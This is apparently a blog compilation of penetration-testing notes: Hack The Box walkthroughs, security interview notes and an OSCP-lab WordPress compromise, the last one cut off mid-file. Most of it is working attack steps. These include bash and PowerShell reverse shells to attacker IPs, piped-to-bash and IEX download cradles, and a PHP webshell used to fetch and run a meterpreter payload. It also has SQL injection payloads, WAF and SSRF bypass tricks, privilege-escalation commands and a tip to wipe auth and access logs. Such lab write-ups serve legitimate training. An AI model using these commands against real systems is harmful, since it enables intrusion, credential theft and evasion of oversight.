HTB - Vaccine Walkthrough|WalkThrough-Penetration Testing-HTB-Starting Point

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -p- --min-rate=1000 -T4 10.10.10.46 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt
nmap -sC -sV -p`cat ports.txt` 10.10.10.46

PORT      STATE  SERVICE VERSION
21/tcp    open   ftp     vsftpd 3.0.3
22/tcp    open   ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp    open   http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
48866/tcp closed unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

It seems the port 80 is open, lets take a look

There’s a login page

try the previous credentials, does not work, try sql, not work

FTP login

ftp is open, use the credentials from oopsie:

1
2
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>

we get a backup.zip file, try to unzip it, but it is password protected

try to crack it use john

Crack zip file

1
zip2john backup.zip > hash

crack use rockyou wordlist

1
2
3
john hash --fork=4 -w=~/wordlist/rockyou.txt
john hash --show
backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

password found 741852963

then unzip the file, cat index.php

1
2
3
if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {

then crack md5 2cb42f8734ea607eefed3b70af13bbd3

using an online rainbow table such as crackstation

find password qwerty789

login web

found a potential sql injection 

1
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%Elixir' or 'a'='a%' ^

use sqlmap

1
2
3
set cookie: PHPSESSID=rcmb87pnl11jpe70f1d99euamr

sqlmap -u 'http://10.10.10.46/dashboard.php?search=query' --cookie='PHPSESSID=rcmb87pnl11jpe70f1d99euamr' --os-shell

upgrade the dbshell to bash shell

1
2
nc -nvlp 4444
bash -c 'bash -i >& /dev/tcp/10.10.14.75/4444 0>&1' 
1
SHELL=/bin/bash script -q /dev/null

in /var/www/html/dashboard.php

1
conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

we could also steal the ssh private key, it is in: /var/lib/postgresql/.ssh

1
2
chmod 600 id_rsa
ssh -i id_rsa postgres@10.10.10.46

get the best ssh shell

Linux Privilege Escalation Awesome Script:
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

1
2
3
4
5
6
7
8
9
10
11
12
13
python3 -m http.server 8080
curl http://10.10.14.75:8080/linpeas.sh | bash

══════════╣ Finding 'username' string inside key folders (limit 70)
/var/www/html/index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
/var/www/html/index.php:        <input id="login__username" type="text" name="username" class="form__input" placeholder="Username" required>


╔══════════╣ Finding passwords inside key folders (limit 70) - only PHP files
/var/www/html/dashboard.php:	  $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
/var/www/html/index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
/var/www/html/index.php:        <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>

check sudo -l list all available command can be run

a useful link: https://gtfobins.github.io/gtfobins/

1
2
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
1
2
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash

get the root

Cover

1
2
/var/log/auth.log
/var/log/apache2/access.log

remove your footprints

HTB - Oopsie Walkthrough|WalkThrough-Penetration Testing-HTB-Starting Point

Enumeration

brief scan for open port

1
nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt

detailed scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -sC -sV -p`cat ports.txt` 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 03:00 EDT
Nmap scan report for 10.10.10.28
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds

port 80 is open, take a look use browser

try dirb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dirb 10.10.10.28 -r -z 10
-r to scan non-recursively, and -z 10 to add a 10 millisecond delay to each request  

---- Scanning URL: http://10.10.10.28/ ----
==> DIRECTORY: http://10.10.10.28/css/                                                        
==> DIRECTORY: http://10.10.10.28/fonts/                                                      
==> DIRECTORY: http://10.10.10.28/images/                                                     
+ http://10.10.10.28/index.php (CODE:200|SIZE:10932)                                          
==> DIRECTORY: http://10.10.10.28/js/                                                         
+ http://10.10.10.28/server-status (CODE:403|SIZE:276)                                        
==> DIRECTORY: http://10.10.10.28/themes/                                                     
==> DIRECTORY: http://10.10.10.28/uploads/                                                    
                                                                                              
-----------------
END_TIME: Mon Aug  9 04:10:08 2021
DOWNLOADED: 4612 - FOUND: 2

try nikto:

1
nikto -h 10.10.10.28

By inspect the page source, we found <script src="/cdn-cgi/login/script.js"></script>

inspect cdn-cgi/login page

image

try sql injection:

WTF, we can use the obtained from first box?? are they related? use common username admin

find upload tab: it says This action require super admin rights.

http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1 can reveal account infos use burpsuite to brute force

add to intruder Ctrl+i, go to position tab, clear all the selection, then select 1 in the url, add

create payload use command

1
for x in $(seq 1 100);do echo $x;done > ids.txt

load the payload

If necessary, setup redirection option in option tab: always, check process cookie in redirections

sort by response length, we found id = 30:

1
86575	super admin	superadmin@megacorp.com

we found there are two cookies:

1
Cookie: user=34322; role=admin

try to change it to

1
user=86575; role=superadmin

then we can access upload page:

upload the php-reverse shell, as we discovered use dirb above, there’s a path uploads/ lets try /uploads/php-shell1.php

first open a listening port on 4444

1
2
3
4
5
6
7
8
9
10
11
12
nc -nvlp 4444

listening on [any] 4444 ...
connect to [10.10.14.75] from (UNKNOWN) [10.10.10.28] 57424
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:25:22 up  3:11,  1 user,  load average: 0.01, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
robert   pts/1    10.10.15.98      05:55    1:26m  0.06s  0.06s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

get the shell for user www-data

in /var/www/html/cdn-cgi/login, found db.php

1
2
3
4
$ cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

https://www.php.net/manual/en/mysqli.construct.php

ssh to robert

1
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

check if bugtracker group has any special access

1
2
3
4
5
6
find / -type f -group bugtracker 2>/dev/null
/usr/bin/bugtracker


f      regular file
redirct stderr to null, otherwise there's a lot of permission deny error
1
2
3
4
5
6
7
8
9
10
robert@oopsie:~$ /usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 123
---------------

cat: /root/reports/123: No such file or directory

it seems bugtracker can cat file under /root/reports/, lets try /root/report/../root.txt

get the flag

the official guide give another option, the bugtracker will execute cat with root permission

1
2
robert@oopsie:~$ ls -l /usr/bin/bugtracker 
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

we could forge a cat binary with shell program

1
2
3
4
export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

then run /usr/bin/bugtracker, we gain the root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# cat filezilla.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
    <RecentServers>
        <Server>
            <Host>10.10.10.46</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>ftpuser</User>
            <Pass>mc@F1l3ZilL4</Pass>
            <Logontype>1</Logontype>
            <TimezoneOffset>0</TimezoneOffset>
            <PasvMode>MODE_DEFAULT</PasvMode>
            <MaximumMultipleConnections>0</MaximumMultipleConnections>
            <EncodingType>Auto</EncodingType>
            <BypassProxy>0</BypassProxy>
        </Server>
    </RecentServers>
</FileZilla3>
# pwd
/root/.config/filezilla
HTB - Archetype Walkthrough|WalkThrough-Penetration Testing-HTB-Starting Point

Enumeration

Scan for opening ports

1
2
3
4
nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// >> ports.txt

tr: change \n to ,
sed s/,$ replace the last `,` to empty

more detailed scan

1
nmap -sC -sV -p`cat ports.txt` 10.10.10.27

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s Microsoft SQL Server 2017 
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc        Microsoft Windows RPC
49665/tcp filtered unknown
49667/tcp open     msrpc        Microsoft Windows RPC
49668/tcp open     msrpc        Microsoft Windows RPC
49669/tcp closed   unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
1
Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

445 are open (file sharing smb)

check anonymous login

1
2
3
4
5
6
7
8
9
10
smbclient -N -L \\\\10.10.10.27 
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC

-N: dot not ask for password
-L: list shares
1
2
3
4
5
6
7
8
smbclient -N \\\\10.10.10.27\\backups
smb: \> dir
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

		10328063 blocks of size 4096. 8248806 blocks available
get prod.dtsConfig

A DTSCONFIG file is an XML configuration file used to apply property values to SQL Server Integration Services (SSIS) packages. The file contains one or more package configurations that consist of metadata such as the server name, database names, and other connection properties to configure SSIS packages.

1
2
3
4
5
6
7
8
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

port 1433 is default port for ms-sql-s

1
2
3
4
5
mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

entered the database

check weather the current user has system level privilege

1
2
3
4
5
6
SQL> SELECT IS_SRVROLEMEMBER('sysadmin');
              

-----------   

          1

change configuration to make xp_cmdshell available:
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver15

1
2
3
4
5
6
7
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"

xp_cmdshell:
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15

powershell reverse shell:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

1
2
3
4
reverseshell.ps

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.73',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.73",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

open a webserver for servering the file

1
2
3
4
python3 -m http.server 80

listening for the reverse shell:
nc -vnlp 4242

in sql execute:

1
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.73/ps_shell2.ps1\");"

not sure why the first script get blocked by antivirus software

the flag file stored in :C:\Users\sql_svc\Desktop\user.txt

privilege escalation:

find frequent accessed file or commands:

1
2
3
4
5
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

https://en.wikipedia.org/wiki/Net_(command)

1
2
use: Connect/disconnect computer to/from shared resources, or display information about computer connections

connect to the admin user and look at the desktop

1
2
3
psexec.py administrator@10.10.10.27

cd C:\Users\administrator\Desktop

to use psexec, port445 need to open

Prerequisites:

  • A modern Windows computer (local)
  • File and Printer Sharing open (remote computer, TCP port 445)
  • The admin$ administrative share available (remote computer)
  • You know a local account’s credential (remote computer)
Security Interview Preparation|Study Notes-Security

以下代码中存在什么漏洞?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import java.io.*;
import javax.servlet.http.*;
import java.nio.file.*;
public class ReadFile extends HttpServlet{
    protected void test(HttpServletRequest request, HttpServletResponse response) throws IOException{
        try{
            String url = request.getParameter("url");
            String data = new String(Files.readAllBytes(Paths.get(url)));
        }catch(IOException e){
            PrintWriter out = response.getWriter();
            out.print("File not found");
            out.flush();
        }
    }
}

答案:

sql注入中报错注入常用的函数有:

  • floor():
  • updatexml()
    • updatexml():是mysql对xml文档数据进行查询和修改的xpath函数, updatexml(xml_document,XPthstring,new_value), xpath must be valid path, concat(0x7e, database()), 0x7e is ~, is an invalid xpath format
  • extractvalue()
    • similar to updatexml(), takes an xpath arg
  • exp()
    • return error when argument > 709, ~0 always > 709, usually a statement returns 0. so try exp~(select version()) will return error, and sometimes the version() in error message will be evluated

以下哪个操作在Linux 下需要 root 权限:

  • iptables -t nat -L
  • nc -l -p 1024 (不需要, 因为是listen在>=1024的port上,不属于privileged port)

以下哪些属于缓冲区溢出保护手段?

  • PIE, -fPIE, position independent executable, is used to support ASLR
  • NX, none executable page
  • Stack Canary

不属于:SE(secure element):

PHP变量覆盖:
php中哪些函数使用不当会导致变量覆盖,PHP变量覆盖漏洞小结

  • extract(), parse_str(), import_request_variables()

redis未授权的利用方法包括以下哪几种:

  • 写入ssh秘钥
  • 向web目录中写入webshell
  • 向crontab中写入计划任务

APK V1 签名v1 仅针对单个 ZIP 条目进行验证

Cookie 中的secure属性代表什么:

  • secure属性可防止信息在传递的过程中被监听捕获后导致信息泄露,如果设置为true,可以限制只有通过https访问时,才会将浏览器保存的cookie传递到服务端,如果通过http访问,不会传递cookie。
  • httpOnly属性可以防止程序获取cookie,如果设置为true,通过js等将无法读取到cookie,能有效的防止XSS攻击

CC攻击:Challenge Collapsar Attack, DDoS的一种

Web Application Firewall
WAF机制及绕过方法总结

  • 编码绕过
  • 字母大小写转换绕过
  • 空格过滤绕过 (使用空白符或者+)
  • 双关键字绕过
  • 内联注释绕过
  • 请求方式差异规则松懈性绕过 (例如用Post代替Get)
  • 异常Method绕过 (DigAPi),similar to the above
  • 超大数据包绕过
  • 复参数绕过
  • 添加%绕过过滤
  • 协议未覆盖绕过
  • 宽字节绕过
  • %00截断
    。。。。等等

以下哪个工具可以拦截和修改数据包:

  • Burpsuite
  • Fiddler

防御CSRF漏洞:

  • 校验referer
  • 请求中添加token
  • 验证码

SSRF: Server-side request Forgery (https://websec.readthedocs.io/zh/latest/vuln/ssrf.html)
SSRF涉及到的危险函数主要是网络访问,支持伪协议的网络读取。以PHP为例,涉及到的函数有 file_get_contents() / fsockopen() / curl_exec() 等。

一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP
对于这种过滤我们采用改编IP的写法的方式进行绕过,例如192.168.0.1这个IP地址可以被改写成:

  • 8进制格式:0300.0250.0.1
  • 16进制格式:0xC0.0xA8.0.1
  • 10进制整数格式:3232235521
  • 16进制整数格式:0xC0A80001
  • 合并后两位:1.1.278 / 1.1.755
  • 合并后三位:1.278 / 1.755 / 3.14159267

产生死锁的四个必要条件:

  • 互斥条件:一个资源每次只能被一个进程使用。
  • 请求与保持条件:一个进程因请求资源而阻塞时,对已获得的资源保持不放。
  • 不剥夺条件:进程已获得的资源,在末使用完之前,不能强行剥夺。
  • 循环等待条件:若干进程之间形成一种头尾相接的循环等待资源关系。
    这四个条件是死锁的必要条件,只要系统发生死锁,这些条件必然成立,而只要上述条件之一不满足,就不会发生死锁。

DSA与RSA

浅析DOM型XSS 不会与后台产生交互

参数化查询防范sql注入(parameterized query)
e.g.

1
2
INSERT INTO myTable (c1, c2, c3, c4) VALUES (@c1, @c2, @c3, @c4)
UPDATE myTable SET c1 = ?, c2 = ?, c3 = ? WHERE c4 = ?

/var/log目录下的20个Linux日志文件功能详解

hydra 是一款爆破工具

数学家冯·诺依曼提出了计算机制造的三个基本原则,即采用二进制逻辑、程序存储执行以及计算机由五个部分组成(运算器、控制器、存储器、输入设备、输出设备),这套理论被称为冯·诺依曼体系结构。

越权:越权(水平越权和垂直越权)(Broken Access Control,简称BAC)

以下命令可以用来在Linux中查看selinux状态的是:
getenforce 

1
pr - convert text files for printing

Usual Linux: DAC (Discretionary Access Control)

  • Users are allowed to alter the access contorol lists on objects they own
    SELinux: MAC (Mandatory Access Control)
  • The system (admin) sets up the access control lists and users have no control over changing the list

SELinux 入门

XSS 防御:
htmlspecialchars:可以把输入内容转换为HTML实体.

RCE Remote code execution

OSCP Exam Tips|OSCP-Study Notes-Penetration Testing

During the exam

https://www.youtube.com/watch?v=qiXPM4O427A

  1. organize your notes and know what machine you need to target what their point values are
  2. star up auto recon for the four machines excluding the buffer overflow and move on the buffer overflow (scan should be done within the first hour)
Study Notes - 2021/07/11|Study Notes-Penetration Testing

Penetration Example

Add host name (Optional)

Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ sudo nmap -sC -sS -p0-65535 sandbox.local
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-11 12:49 EDT
Nmap scan report for sandbox.local (10.11.1.250)
Host is up (0.025s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 86:8f:89:36:79:2f:44:b2:61:18:a4:fb:d5:a1:f3:43 (RSA)
|   256 de:f3:84:f1:cd:f3:c8:9a:30:6d:60:e8:b1:1d:99:27 (ECDSA)
|_  256 14:6a:ba:77:e0:57:e5:0c:c0:cc:76:31:91:8d:dd:9f (ED25519)
80/tcp open  http
|_http-generator: WordPress 5.3
|_http-title: SandBox &#8211; See the future, Feel the shine

Nmap done: 1 IP address (1 host up) scanned in 126.77 seconds

autorecon: autorecon -t target.txt

targeting the web application

nmap scan indicate the webpage generated by wordpress5.3, looking for themes and plugins, may become our target.

Perform a basic directory brute force to discover any sensitive files and confirm it is actually wordpress.

autorecon results are stored in “resutls/scan/tcp_80_http_feroxbuster.txt”, autorecon uses feroxbuster
Some common wordpress directory in the target:

1
2
3
4
5
6
7
8
9
10
11
301        9l       28w      317c http://sandbox.local/wp-admin
301        9l       28w      319c http://sandbox.local/wp-content
200        0l        0w        0c http://sandbox.local/wp-blog-header.php
200        0l        0w        0c http://sandbox.local/wp-config.php
301        9l       28w      320c http://sandbox.local/wp-includes
200        0l        0w        0c http://sandbox.local/wp-cron.php
200       11l       23w      220c http://sandbox.local/wp-links-opml.php
200        0l        0w        0c http://sandbox.local/wp-load.php
200       91l      324w     4874c http://sandbox.local/wp-login.php
403      121l      315w     2709c http://sandbox.local/wp-mail.php
302        0l        0w        0c http://sandbox.local/wp-signup.php

the tutorial uses dirb:

1
2
3
4
dirb http://sandbox.local
==> DIRECTORY: http://sandbox.local/wp-admin/
==> DIRECTORY: http://sandbox.local/wp-content/
==> DIRECTORY: http://sandbox.local/wp-includes/

dirb seems did some recursive search under each directory

use wp scan for wordpress vul scan:

1
wpscan --url sandbox.local --enumerate ap,at,cb,dbe -o wpscan.txt -f cli-no-color

(–enumerate) to include “All Plugins” (ap), “All Themes” (at), “Config backups” (cb), and “Db exports” (dbe).

Found some plugins

1
2
3
elementor
ocean-extra
wp-survey-and-poll

Use searchsploit to search for vulns, first search their name, but nonthing found

search for survey and poll

1
2
3
4
5
6
7
8
searchsploit wordpress survey poll
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ ---------------------------------
WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injecti | php/webapps/45411.txt
WordPress Plugin Survey and Poll 1.1 - Blind SQL Injection        | php/webapps/36054.txt
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

wpscan indicate the plugin version could be 1.5.7.3

look at its description:

1
2
less /usr/share/exploitdb/exploits/php/webapps/45411.txt
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

Use burpsuite to intercept the communication

Use burpsuite repeater,
proxy->http_history->find the request->send to repeater

replace the cookie with:

1
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

and send to the server,
find db version: 10.3.20-MariaDB

get a list of table:

1
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]

find an interesting table: wp_users
find its coloums: 

1
["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns where table_name='wp_users'#"];
1
[\"ID\"],[\"user_login\"],[\"user_pass\"],[\"user_nicename\"],[\"user_email\"],[\"user_url\"],[\"user_registered\"],[\"user_activation_key\"],[\"user_status\"],[\"display_name\"]]}

get login name:

1
["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"];

wp_ajla_admin
get password:

1
["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users where user_login='wp_ajla_admin'#"];

the result is hash:

1
2
[\"$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i\\\/\"]
$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/

it uses three \\\ to escape a single /

cracking the password from hash, use the rockyou wordlist: 

1
2
3
4
5
6
7
8
9
10
11
12
13
echo '$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/' > pass.txt

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!love29jan2006!  (?)
1g 0:00:19:52 DONE (2021-07-11 15:22) 0.000838g/s 12018p/s 12018c/s 12018C/s !luv2:P..!lilkilla!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

Login the wp page with password: wp_ajla_admin/!love29jan2006!
http://sandbox.local/wp-admin

Enumerating the admin interface

For wordpress, look at the info tag: tool->site_health->info

1
2
3
4
5
6
7
8
9
10
11
Server:
Server architecture	Linux 4.4.0-21-generic x86_64
Web server	Apache/2.4.18 (Ubuntu)
PHP version	7.0.33-0ubuntu0.16.04.7 (Supports 64bit values)

Database:
Extension	mysqli
Server version	10.3.20-MariaDB
Client version	mysqlnd 5.0.12-dev - 20150407 - $Id: b5c5906d452ec590732a93b051f3827e02749b83 $
Database user	wp
Database host	10.5.5.11

Database in running on 10.5.5.11, different from what we are targeting. 10.11.1.250

we can install our own plugins, there are some malicious wordpress plugins

in secliscd /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

upload plugin and get error:

1
The package could not be installed. PCLZIP_ERR_BAD_FORMAT (-10) : Unable to find End of Central Dir Record signature

Search online, and find that I need to pack the php file to zip

1
zip bad_plugin.zip /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

then upload

fatal error when try to activate:

1
Plugin could not be activated because it triggered a fatal error.

it dont need to be activate

test:

1
http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=id

ok, it works, then we tries to generate a reverse shell

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.165 LPORT=443 -f elf > shell.elf

we know the target is a linux machine, we use LPORT=443 to evade any outbound firewall rules

then upload the shell to that machine, create a python sever at current directory

1
sudo python3 -m http.server 80

download the shell binary

1
curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=wget%20http://192.168.119.165/shell.elf

use %20 to replace space in url

start a listening port

1
2
3
4
5
kali@kali:~$ sudo msfconsole -q -x "use exploit/multi/handler;\
> set PAYLOAD linux/x86/meterpreter/reverse_tcp;\
> set LHOST 192.168.119.165;\
> set LPORT 443;\
> run"

execute the reverse shell, first check the permission

1
2
3
curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=ls%20-l%20shell.elf
# change the permission
curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=chmod%20777%20shell.elf

run

1
curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=./shell.elf

in meterpreter, can goto regular shell use shell

Post-Exploitation Enumeration

gather some information such as network config, hostname, os version and kernel info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:bf:19:da  
          inet addr:10.4.4.10  Bcast:10.4.4.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:febf:19da/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:158345 errors:0 dropped:240 overruns:0 frame:0
          TX packets:169172 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:122457155 (122.4 MB)  TX bytes:68118761 (68.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:732 errors:0 dropped:0 overruns:0 frame:0
          TX packets:732 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:67520 (67.5 KB)  TX bytes:67520 (67.5 KB)

hostname
ajla

uname -a
Linux ajla 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/issue
Ubuntu 16.04 LTS \n \l

cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016

find database credentials in the configuration file: wp-config.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
pwd
/var/www/html

cat wp-config.php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

